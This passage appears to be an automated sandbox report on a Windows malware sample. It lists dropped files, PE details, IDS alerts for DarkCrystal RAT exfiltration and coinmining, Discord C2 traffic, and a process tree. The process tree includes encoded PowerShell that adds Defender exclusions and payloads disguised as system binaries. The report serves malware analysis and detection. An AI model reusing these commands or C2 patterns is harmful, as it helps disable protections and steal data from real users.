SHA-512:	104FA2DAD10520D46EB537786868515683752665757824068383DC4B9C03121B79D9F519D8842878DB02C9630D1DFE2BBC6E4D7B08AFC820E813C250B735621A
Malicious:	false
Reputation:	unknown
Preview:	MSCF....Z.......D................/..........Z....J..........d.......................environment.xml........CK....8.....w..=.9%T`.eu:.jn.E.8......m_.o?...5.K.{.3X3....^.{i..b......{.+.....y:..KW;;\..n.K=.]k..{.=..3......D$.&IQH.$-..8.r.{..HP.........g....^..~......e.f2^..N.`.B..o.t....z..3..[#..{S.m..w....<M...j..6.k.K.....~.SP.mx..;N.5..~\.[.!gP...9r@"82"%.B%..<2.c....vO..hB.Fi....{...;.}..f\|..g.7..6..].7B..O..#d..]Ls.k..Le...2...&I.Q.,....0.\.-.#..L%.Z.G..K.tU.n...J..TM....4....~...:..2.X..p.d....&.Bj.P(.."..).s.d....W.=n8...n...rr..O._.yu...R..$....[...=H"K<.`.e...d.1.3.gk....M..<R......%1BX.[......X.....q......:...3..w....QN7. .qF..A......Q.p...G...JtL...8sr.s.eQ.zD.u...s.....tjj.G.....Fo...f`Bb<.]k..e.b..,......1.:-....K.......M..;....(,.W.V(^_.....9.,`\|...9...>..R...2\|.\|5.r....n.y>wwU..5...0.J....H........J.0.I....1.0...`.H.e......0....+.....7......0..0V..+.....7....H.......$f.....`..41200..+.....7...1". ...>^..~a..e.D.V.C...

C:\Windows\SoftwareDistribution\SLS\E7A50285-D08D-499D-9FF8-180FDC2332BC\sls.cab

Download File

Process:	C:\Windows\System32\SIHClient.exe
File Type:	Microsoft Cabinet archive data, single, 11149 bytes, 1 file, at 0x44 +Utf "environment.cab", flags 0x4, ID 18779, number 1, extra bytes 20 in head, 1 datablock, 0x1 compression
Category:	dropped
Size (bytes):	30005
Entropy (8bit):	7.7369400192915085
Encrypted:	false
SSDEEP:	768:ouCAyCeQ8fkZdfTGo/its89z8gjP69zA4:Aqf56z8HzT
MD5:	4D7FE667BCB647FE9F2DA6FC8B95BDAE
SHA1:	B4B20C75C9AC2AD00D131E387BCB839F6FAAABCA
SHA-256:	BE273EA75322249FBF58C9CAD3C8DA5A70811837EF9064733E4F5FF1969D4078
SHA-512:	DDB8569A5A5F9AD3CCB990B0A723B64CEE4D49FA6515A8E5C029C1B9E2801F59259A0FC401E27372C133952E4C4840521419EF75895260FA22DFF91E0BE09C02
Malicious:	false
Reputation:	unknown
Preview:	MSCF.....+......D...............[I...........+...I..........d.......rM..............environment.cab...Q.!+rMCK.\|.XT....CI7.....AR..$..C$D....RA:....T..........o...g...>.....s....z...>..<...J.R.A......%}..... 0............\...e.z...@..{..,./.:9:X8.s^q...>.(]...I)....'..v@....!.(.i.n.!.g.8\/.+X3.E.~.pi...Q...B...."Oj..~.:....M....uB.}..v.WR........tDD......D7..j..`..5..E.2.z..C....4.s....r..Y.:.\|.mtg...S..b._.....!.~Kn..E.=...x.N..e.)....xz...p..h.;..xR'...U.}........nK.+.Y........p..r _.;?.m}$..%&...8. 7..T....,7..F...e...kI.y...q....".W.W..[..gZQ.....W.$k.T"...N....5.R...,+...u.~VO...R-......H7..9........].K....]....tS~.LSi....T....3+........k......i.J.y...,.Y\|.N.t.LX.....zu..8......S7..{y.m.....Ob.....^.S8Kn.i.._.c~.x.ce.A...t........S.......i1......V..S]H....$..J....E..j...4...o.$..).....;.n<.b.}.(.J.]...Q..u,.-.Bm.[z.j..-i.."...._v.......N..+...g..v..../...;G.Yw....0..u...z....J..K.E..s&..u.h3.]J.G............Z....=.N.X..

C:\Windows\System32\CSCCC22D6FAD44545049E46F17EB7F694E7.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	1224
Entropy (8bit):	4.435108676655666
Encrypted:	false
SSDEEP:	24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
MD5:	931E1E72E561761F8A74F57989D1EA0A
SHA1:	B66268B9D02EC855EB91A5018C43049B4458AB16
SHA-256:	093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
SHA-512:	1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
Malicious:	false
Reputation:	unknown
Preview:	.... ...........................\|...<...............0...........\|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi

C:\Windows\System32\SecurityHealthSystray.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	4608
Entropy (8bit):	3.914120675277484
Encrypted:	false
SSDEEP:	48:6+pLPt2M7Jt8Bs3FJsdcV4MKe271JTvqBHuOulajfqXSfbNtm:5PVPc+Vx9MvvkIcjRzNt
MD5:	972B3812327AE660D982DA00C88FA9E0
SHA1:	1C8E34C9D965636968491945C6BCB469BB50D274
SHA-256:	F4A0049A452EE58AB9394817C665A68C3B2B84FF178ED4F64F956B5FCA4894A3
SHA-512:	726976960765B3B1B146B4B9C5AA845560E729A8082393BCF97B3B677AF9EB161A30F91DA15CB558F870D865A1C33FB5B3D3E28EBEF0C0DF658305D660EFC0B5
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...df.f............................~'... ...@....@.. ....................................@.................................,'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................`'......H.......(!................................................................(.....0..!.......r...pre..p.{....(....(....&..&......................0..........ri..p(....&..&......................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(......(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....4.......#US.........#GUID....... ...#Blob...........WU........%3................................................................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.465718871195694
Encrypted:	false
SSDEEP:	6144:EIXfpi67eLPU9skLmb0b4fWSPKaJG8nAgejZMMhA2gX4WABl0uNJdwBCswSby:5XD94fWlLZMM6YFHD+y
MD5:	D7A467191843EB20EFA2998DD39D5DE2
SHA1:	A95892BF2D77DB976F6C7AE7A0F0880C87CBE6CB
SHA-256:	B8C5F0BE2EE4B1D804E77037A5C861F3CF6F19508C3E6797974F85A2ECFAF861
SHA-512:	6D71DF3A902CFFC61803995E0BDF6751B1DBB4AE404D58C1D694F553F2071D8BDDFCCA94D8DB42D24EC6B0284AF08BC42A05D47A4492BCAF2BF0913E05915055
Malicious:	false
Reputation:	unknown
Preview:	regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.:\|.................................................................................................................................................................................................................................................................................................................................................LCj.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.999982552411429
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	87Bym0x4Fy.exe
File size:	22'314'496 bytes
MD5:	7aa4185295ab3f4f896704aed05c0795
SHA1:	3ae4ec10990ff35a466328f1bc0e8ece616df3c3
SHA256:	cb300f10e391aa185ea9555d9122f91dca8eb2dfb064f14180340f48b83be623
SHA512:	997ffd6fae8e72b7ca5c62f7de9a9a2c487580b0fec589d305c485163ff873539baa20c5791c3626403cf824a02ebf458c24e28236eae45a75461d1ba88a9e45
SSDEEP:	393216:jVymy1SvjN1GnU7s1/aRUFWYbyemyzgnfpyyxlj3OMddmZceVUJA9OhBI1Hs7:Em+SvZs+sldbzgRhFldmZceX9OP7
TLSH:	6727339BF9236CEAD5D6ACB01D1F4C016518F79158006EECA18CFEE5D7ACB0C6E16A70
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...cC.f.................tT.........>.T.. ....T...@.. ........................T...........@................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x194923e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x669E4363 [Mon Jul 22 11:32:51 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x15491e4	0x57	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x154a000	0x578	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x154c000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x1547244	0x1547400	7e62e6fa2f94df65ce7212e2aa8064c4	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x154a000	0x578	0x600	45d07ab1acc40cbf1762eb982c9781e9	False	0.4049479166666667	data	4.24040352921975	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x154c000	0xc	0x200	31ab67373496515d128e65a56f4c65bb	False	0.044921875	data	0.12227588125913882	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x154a0a0	0x22c	data			0.4676258992805755
RT_MANIFEST	0x154a2d0	0x2a2	XML 1.0 document, ASCII text			0.4732937685459941

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Source Port	Dest Port	Source IP	Dest IP
2024-08-01T10:57:10.753831+0200	TCP	2826930	ETPRO COINMINER XMR CoinMiner Usage	49748	443	192.168.2.4	45.76.89.70
2024-08-01T10:58:33.850462+0200	TCP	2048130	ET MALWARE [ANY.RUN] DarkCrystal Rat Exfiltration (POST)	49745	80	192.168.2.4	194.58.42.154
2024-08-01T10:58:09.528507+0200	UDP	2036289	ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro)	55793	53	192.168.2.4	1.1.1.1
2024-08-01T10:57:57.535717+0200	TCP	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	49745	80	192.168.2.4	194.58.42.154

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 1, 2024 10:57:09.990937948 CEST	49730	443	192.168.2.4	162.159.130.234
Aug 1, 2024 10:57:09.990991116 CEST	443	49730	162.159.130.234	192.168.2.4
Aug 1, 2024 10:57:09.991106033 CEST	49730	443	192.168.2.4	162.159.130.234
Aug 1, 2024 10:57:10.008022070 CEST	49730	443	192.168.2.4	162.159.130.234
Aug 1, 2024 10:57:10.008042097 CEST	443	49730	162.159.130.234	192.168.2.4
Aug 1, 2024 10:57:10.537710905 CEST	443	49730	162.159.130.234	192.168.2.4
Aug 1, 2024 10:57:10.538017988 CEST	49730	443	192.168.2.4	162.159.130.234
Aug 1, 2024 10:57:10.624789000 CEST	49730	443	192.168.2.4	162.159.130.234
Aug 1, 2024 10:57:10.624824047 CEST	443	49730	162.159.130.234	192.168.2.4
Aug 1, 2024 10:57:10.625900030 CEST	443	49730	162.159.130.234	192.168.2.4
Aug 1, 2024 10:57:10.676357031 CEST	49730	443	192.168.2.4	162.159.130.234
Aug 1, 2024 10:57:10.753555059 CEST	49730	443	192.168.2.4	162.159.130.234
Aug 1, 2024 10:57:10.800506115 CEST	443	49730	162.159.130.234	192.168.2.4
Aug 1, 2024 10:57:10.882524967 CEST	443	49730	162.159.130.234	192.168.2.4
Aug 1, 2024 10:57:10.882680893 CEST	443	49730	162.159.130.234	192.168.2.4
Aug 1, 2024 10:57:10.883514881 CEST	49730	443	192.168.2.4	162.159.130.234
Aug 1, 2024 10:57:10.916800022 CEST	49730	443	192.168.2.4	162.159.130.234

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 1, 2024 10:57:09.968135118 CEST	56588	53	192.168.2.4	1.1.1.1
Aug 1, 2024 10:57:09.976161003 CEST	53	56588	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Aug 1, 2024 10:57:09.968135118 CEST	192.168.2.4	1.1.1.1	0x6f9f	Standard query (0)	gateway.discord.gg	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Aug 1, 2024 10:57:09.976161003 CEST	1.1.1.1	192.168.2.4	0x6f9f	No error (0)	gateway.discord.gg	162.159.130.234	A (IP address)	IN (0x0001)	false
Aug 1, 2024 10:57:09.976161003 CEST	1.1.1.1	192.168.2.4	0x6f9f	No error (0)	gateway.discord.gg	162.159.134.234	A (IP address)	IN (0x0001)	false
Aug 1, 2024 10:57:09.976161003 CEST	1.1.1.1	192.168.2.4	0x6f9f	No error (0)	gateway.discord.gg	162.159.133.234	A (IP address)	IN (0x0001)	false
Aug 1, 2024 10:57:09.976161003 CEST	1.1.1.1	192.168.2.4	0x6f9f	No error (0)	gateway.discord.gg	162.159.135.234	A (IP address)	IN (0x0001)	false
Aug 1, 2024 10:57:09.976161003 CEST	1.1.1.1	192.168.2.4	0x6f9f	No error (0)	gateway.discord.gg	162.159.136.234	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

gateway.discord.gg

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	162.159.130.234	443	7176	C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-01 08:57:10 UTC	187	OUT	GET /?v=9&encording=json HTTP/1.1 Connection: Upgrade,Keep-Alive Upgrade: websocket Sec-WebSocket-Key: pEXqwa4GxwmcjiDtvHZVTg== Sec-WebSocket-Version: 13 Host: gateway.discord.gg
2024-08-01 08:57:10 UTC	618	IN	HTTP/1.1 404 Not Found Date: Thu, 01 Aug 2024 08:57:10 GMT Content-Length: 0 Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TVLozOVy8Fk7BeFX7Ni1ydTRST3KHWMMR6MKVKasifwnv77VhA3Mtg5hFW0%2BtQH%2FVCmRtOxyPuvwp16IuVQL6HaAhwEALnKbf21QvYxv%2BEspwbzB1ljE%2FRv%2FZInw1sYeLWOG5Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Strict-Transport-Security: max-age=31536000; includeSubDomains; preload X-Content-Type-Options: nosniff Server: cloudflare CF-RAY: 8ac49e828eb841ed-EWR

Target ID:	0
Start time:	04:57:05
Start date:	01/08/2024
Path:	C:\Users\user\Desktop\87Bym0x4Fy.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\87Bym0x4Fy.exe"
Imagebase:	0x60000
File size:	22'314'496 bytes
MD5 hash:	7AA4185295AB3F4F896704AED05C0795
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DiscordRat, Description: Yara detected Discord Rat, Source: 00000000.00000002.1723649047.00000000039D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	04:57:06
Start date:	01/08/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAaQBqACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHIAcgBwACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAZQByAHIAbwByADoAIABlAHgAcABlAGMAdABlAGQAIAAnACcAOwAnACcAIABiAGUAZgBvAHIAZQAgACcAJwByAGUAdAB1AHIAbgAnACcAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAGgAegB5ACMAPgA="
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	04:57:06
Start date:	01/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	04:57:07
Start date:	01/08/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAZABtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAawBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGEAbgBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHkAbAB5ACMAPgA="
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	04:57:07
Start date:	01/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	04:57:08
Start date:	01/08/2024
Path:	C:\Users\user\AppData\Roaming\RuntimeBroker.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\RuntimeBroker.exe"
Imagebase:	0x7ff72b050000
File size:	22'224'360 bytes
MD5 hash:	A83964F260C28614DA067F6B3DF9E044
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	04:57:08
Start date:	01/08/2024
Path:	C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe"
Imagebase:	0x2227b640000
File size:	80'896 bytes
MD5 hash:	95AF6E5D52A57515DC2E638C419F50D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DiscordRat, Description: Yara detected Discord Rat, Source: 00000006.00000000.1716966909.000002227B642000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_DiscordRat, Description: Yara detected Discord Rat, Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	04:57:09
Start date:	01/08/2024
Path:	C:\Users\user\AppData\Roaming\RuntimeBroker.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\RuntimeBroker.exe"
Imagebase:	0x7ff72b050000
File size:	22'224'360 bytes
MD5 hash:	A83964F260C28614DA067F6B3DF9E044
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	04:57:10
Start date:	01/08/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k WerSvcGroup
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	04:57:10
Start date:	01/08/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -pss -s 460 -p 7176 -ip 7176
Imagebase:	0x7ff7aa760000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	04:57:10
Start date:	01/08/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 7176 -s 2308
Imagebase:	0x7ff7aa760000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	04:57:11
Start date:	01/08/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe -pbeznogym
Imagebase:	0x7ff6e1210000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	04:57:11
Start date:	01/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	04:57:12
Start date:	01/08/2024
Path:	C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe -pbeznogym
Imagebase:	0xb40000
File size:	17'874'291 bytes
MD5 hash:	A4FE53D7F7F29D0065F8B589A7B61112
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 58%, ReversingLabs Detection: 51%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	04:57:15
Start date:	01/08/2024
Path:	C:\ProgramData\Microsoft\hacn.exe
Wow64 process (32bit):	false
Commandline:	"C:\ProgramData\Microsoft\hacn.exe"
Imagebase:	0x7ff6d55d0000
File size:	11'662'615 bytes
MD5 hash:	FC445049713C02F9A9DDAA62E404C9E9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 71%, ReversingLabs Detection: 62%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	04:57:15
Start date:	01/08/2024
Path:	C:\ProgramData\Microsoft\based.exe
Wow64 process (32bit):	false
Commandline:	"C:\ProgramData\Microsoft\based.exe"
Imagebase:	0x7ff601510000
File size:	6'171'507 bytes
